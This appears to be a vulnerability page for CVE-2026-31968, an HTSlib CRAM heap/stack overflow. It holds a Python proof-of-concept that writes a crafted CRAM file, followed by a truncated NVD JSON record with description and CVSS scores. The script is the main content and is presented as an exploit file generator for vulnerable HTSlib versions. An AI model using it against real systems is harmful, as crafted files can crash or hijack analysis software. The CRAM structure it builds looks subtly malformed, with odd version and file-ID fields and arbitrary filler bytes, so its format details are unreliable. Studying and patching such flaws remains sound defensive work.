CVE-2026-31968

#!/usr/bin/env python3 """ CVE-2026-31968 PoC - HTSlib CRAM Buffer Overflow This PoC generates a malicious CRAM file that triggers buffer overflow in HTSlib's VARINT/CONST encoding handler. Note: This is a proof-of-concept for educational purposes only. """ import struct import sys def generate_malicious_cram(): """ Generate a crafted CRAM file that exploits the VARINT/CONST encoding validation vulnerability in HTSlib < 1.21.1, 1.22.2, 1.23.1 """ # CRAM file header cram_header = bytearray() # CRAM magic number cram_header.extend(b'CRAM') # File format version (3.1) cram_header.extend(struct.pack('>H', 31)) # File ID cram_header.extend(struct.pack('>I', 1)) # Container header container = bytearray() # Container version container.extend(struct.pack('>H', 31)) # Container length container.extend(struct.pack('>I', 0)) # Block block = bytearray() # Block content ID block.extend(struct.pack('>H', 0)) # Block method (Bzip2) block.append(1) # Block content type (file header) block.append(0) # Crafted data with malicious VARINT/CONST encoding # This triggers the buffer overflow by providing oversized encoded values malicious_data = bytearray() # Add crafted encoding that exceeds buffer bounds # VARINT encoding with malformed length field malicious_data.extend(b'\xff\xff\xff\xff\xff\xff\xff\xff\x7f') # Add CONST encoding with oversized value malicious_data.extend(b'\x00\x41\x42\x43\x44\x45\x46\x47\x48') block.extend(struct.pack('>I', len(malicious_data))) block.extend(malicious_data) # CRC32 checksum import zlib block_crc = zlib.crc32(block) & 0xffffffff block.extend(struct.pack('>I', block_crc)) container.extend(struct.pack('>I', len(block))) container.extend(block) cram_header.extend(container) return bytes(cram_header) def main(): if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <output_cram_file>") print("Generates a PoC CRAM file for CVE-2026-31968") sys.exit(1) output_file = sys.argv[1] print(f"[*] Generating malicious CRAM file for CVE-2026-31968") print(f"[*] Target: HTSlib < 1.21.1, 1.22.2, 1.23.1") print(f"[*] Vulnerability: Buffer overflow in VARINT/CONST encoding") malicious_cram = generate_malicious_cram() with open(output_file, 'wb') as f: f.write(malicious_cram) print(f"[+] PoC file written to: {output_file}") print(f"[+] File size: {len(malicious_cram)} bytes") print("[!] This file should be opened with vulnerable HTSlib version") if __name__ == '__main__': main()

{"cve": {"id": "CVE-2026-31968", "sourceIdentifier": "[email protected]", "published": "2026-03-18T20:16:21.480", "lastModified": "2026-03-19T17:31:24.010", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HTSlib is a library for reading and writing bioinformatics file formats. CRAM is a compressed format which stores DNA sequence alignment data using a variety of encodings and compression methods. For the `VARINT` and `CONST` encodings, incomplete validation of the context in which the encodings were used could result in up to eight bytes being written beyond the end of a heap allocation, or up to eight bytes being written to the location of a one byte variable on the stack, possibly causing the values to adjacent variables to change unexpectedly. Depending on the data stream this could result either in a heap buffer overflow or a stack overflow. If a user opens a file crafted to exploit this issue it could lead to the program crashing, overwriting of data structures on the heap or stack in ways not expected by the program, or changing the control flow of the program. It may be possible to use this to obtain arbitrary code execution. Versions 1.23.1, 1.22.2 and 1.21.1 include fixes for this issue. There is no workaround for this issue."}, {"lang": "es", "value": "HTSlib es una biblioteca para leer y escribir formatos de archivo de bioinformática. CRAM es un formato comprimido que almacena datos de alineación de secuencias de ADN utilizando una variedad de codificaciones y métodos de compresión. Para las codificaciones 'VARINT' y 'CONST', la validación incompleta del contexto en el que se utilizaron las codificaciones podría resultar en la escritura de hasta ocho bytes más allá del final de una asignación de memoria en el montón, o en la escritura de hasta ocho bytes en la ubicación de una variable de un byte en la pila, posiblemente causando que los valores de las variables adyacentes cambien inesperadamente. Dependiendo del flujo de datos, esto podría resultar en un desbordamiento de búfer en el montón o un desbordamiento de pila. Si un usuario abre un archivo diseñado para explotar este problema, podría provocar el bloqueo del programa, la sobrescritura de estructuras de datos en el montón o la pila de formas no esperadas por el programa, o el cambio del flujo de control del programa. Podría ser posible usar esto para obtener ejecución de código arbitrario. Las versiones 1.23.1, 1.22.2 y 1.21.1 incluyen correcciones para este problema. No existe una solución alternativa para este problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-121"}, {"lang": "en", "value": "CWE-122"}, {"lang": "en", "value": "CWE-787"}, {"lang": "en", "value": "CWE-843"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:h ... (truncated)